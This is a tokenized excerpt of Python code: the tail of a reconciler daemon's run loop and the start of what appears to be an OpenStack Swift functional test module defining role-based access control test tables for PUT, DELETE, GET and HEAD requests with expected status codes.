) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . reconcile ( ) <EOL> except : <EOL> self . logger . 
exception ( '<STR_LIT>' ) <EOL> self . log_stats ( force = True ) <EOL> def run_forever ( self , * args , ** kwargs ) : <EOL> while True : <EOL> self . run_once ( * args , ** kwargs ) <EOL> self . stats = defaultdict ( int ) <EOL> self . logger . info ( '<STR_LIT>' , self . interval ) <EOL> time . sleep ( self . interval ) </s>
<s> import unittest <EOL> import uuid <EOL> from random import shuffle <EOL> from nose import SkipTest <EOL> from swiftclient import get_auth , http_connection <EOL> import test . functional as tf <EOL> def setUpModule ( ) : <EOL> tf . setup_package ( ) <EOL> def tearDownModule ( ) : <EOL> tf . teardown_package ( ) <EOL> TEST_CASE_FORMAT = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:object_name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> RBAC_PUT = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , 
'<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_PUT_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , 
None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ] <EOL> RBAC_DELETE = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , 
'<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_DELETE_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None 
, <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_GET = [ <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , 
None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , 
'<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) <EOL> ] <EOL> RBAC_GET_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , 
<EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , 
<EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , 
'<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:GET>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_HEAD = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , 
